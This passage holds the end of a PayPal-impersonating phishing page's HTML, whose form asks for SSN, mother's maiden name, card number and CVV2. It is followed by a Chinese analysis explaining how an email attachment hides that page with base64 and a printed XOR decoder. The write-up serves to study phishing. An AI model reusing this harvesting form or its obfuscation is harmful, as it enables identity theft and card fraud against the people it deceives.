<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobmonth"
id="pdobmonth" size="1" tabindex="3">
<option value="00" selected>Month</option>
<option value="Jan">Jan</option>
<option value="Feb">Feb</option>
<option value="Mar">Mar</option>
<option value="Apr">Apr</option>
<option value="May">May</option>
<option value="Jun">Jun</option>
<option value="Jul">Jul</option>
<option value="Aug">Aug</option>
<option value="Sep">Sep</option>
<option value="Oct">Oct</option>
<option value="Nov">Nov</option>
<option value="Dec">Dec</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobyear" id=
"pdobyear" size="1" tabindex="3">
<option value="00" selected>Year</option>
<option value="1915">1915</option>
<option value="1916">1916</option>
<option value="1917">1917</option>
<option value="1918">1918</option>
<option value="1919">1919</option>
<option value="1920">1920</option>
<option value="1921">1921</option>
<option value="1922">1922</option>
<option value="1923">1923</option>
<option value="1924">1924</option>
<option value="1925">1925</option>
<option value="1926">1926</option>
<option value="1927">1927</option>
<option value="1928">1928</option>
<option value="1929">1929</option>
<option value="1930">1930</option>
<option value="1931">1931</option>
<option value="1932">1932</option>
<option value="1933">1933</option>
<option value="1934">1934</option>
<option value="1935">1935</option>
<option value="1936">1936</option>
<option value="1937">1937</option>
<option value="1938">1938</option>
<option value="1939">1939</option>
<option value="1940">1940</option>
<option value="1941">1941</option>
<option value="1942">1942</option>
<option value="1943">1943</option>
<option value="1944">1944</option>
<option value="1945">1945</option>
<option value="1946">1946</option>
<option value="1947">1947</option>
<option value="1948">1948</option>
<option value="1949">1949</option>
<option value="1950">1950</option>
<option value="1951">1951</option>
<option value="1952">1952</option>
<option value="1953">1953</option>
<option value="1954">1954</option>
<option value="1955">1955</option>
<option value="1956">1956</option>
<option value="1957">1957</option>
<option value="1958">1958</option>
<option value="1959">1959</option>
<option value="1960">1960</option>
<option value="1961">1961</option>
<option value="1962">1962</option>
<option value="1963">1963</option>
<option value="1964">1964</option>
<option value="1965">1965</option>
<option value="1966">1966</option>
<option value="1967">1967</option>
<option value="1968">1968</option>
<option value="1969">1969</option>
<option value="1970">1970</option>
<option value="1971">1971</option>
<option value="1972">1972</option>
<option value="1973">1973</option>
<option value="1974">1974</option>
<option value="1975">1975</option>
<option value="1976">1976</option>
<option value="1977">1977</option>
<option value="1978">1978</option>
<option value="1979">1979</option>
<option value="1980">1980</option>
<option value="1981">1981</option>
<option value="1982">1982</option>
<option value="1983">1983</option>
<option value="1984">1984</option>
<option value="1985">1985</option>
<option value="1986">1986</option>
<option value="1987">1987</option>
<option value="1988">1988</option>
<option value="1989">1989</option>
<option value="1990">1990</option>
<option value="1991">1991</option>
<option value="1992">1992</option>
<option value="1993">1993</option>
<option value="1994">1994</option>
<option value="1995">1995</option>
<option value="1996">1996</option>
<option value="1997">1997</option>
</select></font></label></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Mother's Maiden
Name:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pmmn" tabindex="3" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size=
"2"><span>Country:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><font color="#000000"><strong><select id="pcountry"
name="pcountry" height:="" size="1" tabindex="4">
<option selected>United States</option>
<option>Albania</option>
<option>Algeria</option>
<option>American Samoa</option>
<option>Andorra</option>
<option>Angola</option>
<option>Anguilla</option>
<option>Antarctica</option>
<option>Antigua And Barbuda</option>
<option>Argentina</option>
<option>Armenia</option>
<option>Aruba</option>
<option>Australia</option>
<option>Austria</option>
<option>Azerbaijan</option>
<option>Bahamas</option>
<option>Bahrain</option>
<option>Bangladesh</option>
<option>Barbados</option>
<option>Belarus</option>
<option>Belgium</option>
<option>Belize</option>
<option>Benin</option>
<option>Bermuda</option>
<option>Bhutan</option>
<option>Bolivia</option>
<option>Bosnia and Herzegovina</option>
<option>Botswana</option>
<option>Bouvet Island</option>
<option>Brazil</option>
<option>British Indian Ocean Territory</option>
<option>Brunei Darussalam</option>
<option>Bulgaria</option>
<option>Burkina Faso</option>
<option>Burma</option>
<option>Burundi</option>
<option>Cambodia</option>
<option>Cameroon</option>
<option>Canada</option>
<option>Cape Verde</option>
<option>Cayman Islands</option>
<option>Central African Republic</option>
<option>Chad</option>
<option>Chile</option>
<option>China</option>
<option>Christmas Island</option>
<option>Cocos (Keeling) Islands</option>
<option>Colombia</option>
<option>Comoros</option>
<option>Congo</option>
<option>Congo, the Democratic Republic of the</option>
<option>Cook Islands</option>
<option>Costa Rica</option>
<option>Cote d'Ivoire</option>
<option>Croatia</option>
<option>Cyprus</option>
<option>Czech Republic</option>
<option>Denmark</option>
<option>Djibouti</option>
<option>Dominica</option>
<option>Dominican Republic</option>
<option>East Timor</option>
<option>Ecuador</option>
<option>Egypt</option>
<option>El Salvador</option>
<option>England</option>
<option>Equatorial Guinea</option>
<option>Eritrea</option>
<option>Espana</option>
<option>Estonia</option>
<option>Ethiopia</option>
<option>Falkland Islands</option>
<option>Faroe Islands</option>
<option>Fiji</option>
<option>Finland</option>
<option>France</option>
<option>French Guiana</option>
<option>French Polynesia</option>
<option>French Southern Territories</option>
<option>Gabon</option>
<option>Gambia</option>
<option>Georgia</option>
<option>Germany</option>
<option>Ghana</option>
<option>Gibraltar</option>
<option>Great Britain</option>
<option>Greece</option>
<option>Greenland</option>
<option>Grenada</option>
<option>Guadeloupe</option>
<option>Guam</option>
<option>Guatemala</option>
<option>Guinea</option>
<option>Guinea-Bissau</option>
<option>Guyana</option>
<option>Haiti</option>
<option>Heard and Mc Donald Islands</option>
<option>Honduras</option>
<option>Hong Kong</option>
<option>Hungary</option>
<option>Iceland</option>
<option>India</option>
<option>Indonesia</option>
<option>Ireland</option>
<option>Israel</option>
<option>Italy</option>
<option>Jamaica</option>
<option>Japan</option>
<option>Jordan</option>
<option>Kazakhstan</option>
<option>Kenya</option>
<option>Kiribati</option>
<option>Korea (North)</option>
<option>Korea, Republic of</option>
<option>Korea (South)</option>
<option>Kuwait</option>
<option>Kyrgyzstan</option>
<option>Lao People's Democratic Republic</option>
<option>Latvia</option>
<option>Lebanon</option>
<option>Lesotho</option>
<option>Liberia</option>
<option>Liechtenstein</option>
<option>Lithuania</option>
<option>Luxembourg</option>
<option>Macau</option>
<option>Macedonia</option>
<option>Madagascar</option>
<option>Malawi</option>
<option>Malaysia</option>
<option>Maldives</option>
<option>Mali</option>
<option>Malta</option>
<option>Marshall Islands</option>
<option>Martinique</option>
<option>Mauritania</option>
<option>Mauritius</option>
<option>Mayotte</option>
<option>Mexico</option>
<option>Micronesia, Federated States of</option>
<option>Moldova, Republic of</option>
<option>Monaco</option>
<option>Mongolia</option>
<option>Montserrat</option>
<option>Morocco</option>
<option>Mozambique</option>
<option>Myanmar</option>
<option>Namibia</option>
<option>Nauru</option>
<option>Nepal</option>
<option>Netherlands</option>
<option>New Caledonia</option>
<option>New Zealand</option>
<option>Nicaragua</option>
<option>Niger</option>
<option>Nigeria</option>
<option>Niue</option>
<option>Norfolk Island</option>
<option>Northern Ireland</option>
<option>Northern Mariana Islands</option>
<option>Norway</option>
<option>Oman</option>
<option>Pakistan</option>
<option>Palau</option>
<option>Panama</option>
<option>Papua New Guinea</option>
<option>Paraguay</option>
<option>Peru</option>
<option>Philippines</option>
<option>Pitcairn</option>
<option>Poland</option>
<option>Portugal</option>
<option>Puerto Rico</option>
<option>Qatar</option>
<option>Reunion</option>
<option>Romania</option>
<option>Russia</option>
<option>Russian Federation</option>
<option>Rwanda</option>
<option>San Marino</option>
<option>Sao Tome and Principe</option>
<option>Saudi Arabia</option>
<option>Scotland</option>
<option>Senegal</option>
<option>Seychelles</option>
<option>Singapore</option>
<option>Slovakia</option>
<option>Slovenia</option>
<option>Solomon Islands</option>
<option>Somalia</option>
<option>South Africa</option>
<option>South Georgia and the South Sandwich Islands</option>
<option>South Korea</option>
<option>Spain</option>
<option>Sri Lanka</option>
<option>St. Helena</option>
<option>Sweden</option>
<option>Switzerland</option>
<option>Taiwan</option>
<option>Tajikistan</option>
<option>Tanzania</option>
<option>Thailand</option>
<option>Togo</option>
<option>Tokelau</option>
<option>Tonga</option>
<option>Trinidad</option>
<option>Trinidad and Tobago</option>
<option>Tunisia</option>
<option>Turkey</option>
<option>Turkmenistan</option>
<option>Uganda</option>
<option>Ukraine</option>
<option>United Arab Emirates</option>
<option>United Kingdom</option>
<option>United States</option>
<option>United States Minor Outlying Islands</option>
<option>Uruguay</option>
<option>USA</option>
<option>Uzbekistan</option>
<option>Vanuatu</option>
<option>Vatican City State (Holy See)</option>
<option>Venezuela</option>
<option>Viet Nam</option>
<option>Virgin Islands (British)</option>
<option>Virgin Islands (U.S.)</option>
<option>Wales</option>
<option>Wallis and Futuna Islands</option>
<option>Western Sahara</option>
<option>Yemen</option>
<option>Zambia</option>
<option>Zimbabwe</option>
</select></strong></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>State:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pstate" size="14" tabindex="5"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>City:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pcity" size="14" tabindex="6"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>Address:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><font face="Verdana"><input name="paddr" size="31"
tabindex="7"></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size="2"><span>Zip
Code:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><input name="pzip" size="10" tabindex="8"
maxlength="10"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Phone
Number:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pphone" size="14" tabindex="9"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Social Security
Number (SSN):</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pssn" size="14" tabindex="10"></p>
</td>
</tr>
</table>
</fieldset>
<br>
<fieldset><legend>Credit/Debit Card Verification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="29">
<tr valign="bottom">
<td height="29">
<p align="left"><font face="Verdana" size="2"><span>Card
Number:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pccn" size="16" tabindex="11"
maxlength="16" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="28">
<p align="left"><font face="Verdana" size="2"><span>Expiration
Date:</span></font></p>
</td>
<td align="right" width="367" height="28">
<p align="left"><label for="pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpm" id=
"pexpm" size="1" tabindex="12">
<option value="00" selected>Month</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select></font></label> <span>-</span> <label for=
"pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpy" id=
"pexpy" size="1" tabindex="13">
<option value="00" selected>Year</option>
<option value="15">2015</option>
<option value="16">2016</option>
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>
<option value="22">2022</option>
<option value="23">2023</option>
<option value="24">2024</option>
<option value="2025">2025</option>
</select></font></label> <font size="2" face=
"Verdana"><span> (Ex: 05/2015)</span></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="30">
<tr valign="bottom">
<td height="30">
<p align="left"><font face="Verdana" size="2"><span>Card
Verification Number (CVV2):</span></font></p>
</td>
<td align="right" width="367" height="30">
<p align="left"><input name="pcvv" size="4" tabindex="14"
maxlength="3" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<p align="center"><font color="#003366"><input type="submit"
tabindex="15" name="x01.php" value="Submit Form" class=
"primary"></font></p>
<p align="left"><font color="#003366"><font size="1">By clicking
the button "Submit Form" you confirm your identity with us. The
form is submitted instantly.</font></font></p>
<p align="left"></p>
</fieldset>
</form>
</td>
<td class="pp_heading" align="left" width="239" valign="top" style=
"padding-left: 4px;">
<table cellspacing="0" cellpadding="0" width="100%" bgcolor=
"#FFFFFF" border="0">
<tbody>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your Account
Info</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext"><br>
Make sure you never provide your password to fraudulent
persons.<br>
<br>
PayPal automatically encrypts your confidential information using
the Secure Sockets Layer protocol (SSL) with an encryption key
length of 128-bits (the highest level commercially available).<br>
<br>
For more information on protecting yourself from fraud, please
review our Security Tips at
http://www.paypal.com/securitytips<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your
Password</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext">You should <span class=
"ppem106">never</span> give your PayPal password to anyone,
including PayPal employees.<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<hr class="space">
<p> </p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<br></td>
</tr>
</tbody>
</table>
</td>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
</td>
<td valign="top" width="190" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
</td>
</tr>
</tbody>
</table>
</body>
</html>
我想我昨天才收到这条特别的消息。 Avast 在通过 Outlook 下载时最终标记了它,我想今天看看它。我收到的附件好像和你的一模一样。让我们专注于脚本。
第一行,function BDE(r),看起来像是某种解码器。查看调用此函数的第二行,显然 BDE() 是一个 base64 解码器。第二行调用将base64转成blob存入BSs.
如果您对 base64 字符串进行解码,您会发现结果并不完全可读。查看脚本的其余部分,很明显解码结果是通过另一个函数提供的,并且在被该函数转换之后,应该会产生类似于 HTML 的结果。第三行是有趣的地方。这是美化后的代码:
function XD1(r, t) {
var n = [],
o = "";
for (z = 1; 255 >= z; z++) n[String.fromCharCode(z)] = z;
for (j = z = 0; z < r.length; z++) o += String.fromCharCode(n[r.substr(z, 1)] ^ n[t.substr(j, 1)]), j = j < t.length ? j + 1 : 0;
return o
}
变量n是一个数组,初始化值为0到255,从第三行可以看出。我们称之为 "cipher table"。 o 是 return 值。第四行是完成实际工作的地方。请记住 r 是要解密的内容,而 t 是密钥。循环所做的是对内容中的每个字节,它使用该字节索引到密码 table,同时,顺序地从密钥中选择一个字节并使用它索引到密码 table。两个结果字节被异或在一起,转换为一个字符,并附加到结果中。使用 table 而不是直接进行 XORing 的原因是因为字符串 XOR 字符串不会产生有用的结果。相反,通过索引到 table,接收到两个数字,可以将它们异或在一起,并将结果转换为字符。最后,这是您的标准 XOR 密码。
关于解密循环的一个有趣的怪癖是这个片段:j = j < t.length ? j + 1 : 0。当您遇到 j 比 t.length 小一的情况时,j 仍然递增,并导致尝试对 t 使用越界索引。 substr() returns 0,当使用正确的异或密码实现时,它有效地在密钥末尾添加了一个空字符。
父脚本的最后一行将解密数据写入文档,这是一个简单的 HTML 页面,其中包含用于提交您的信用卡信息的表单。
总结:脚本base64解码,异或解密数据,写入页面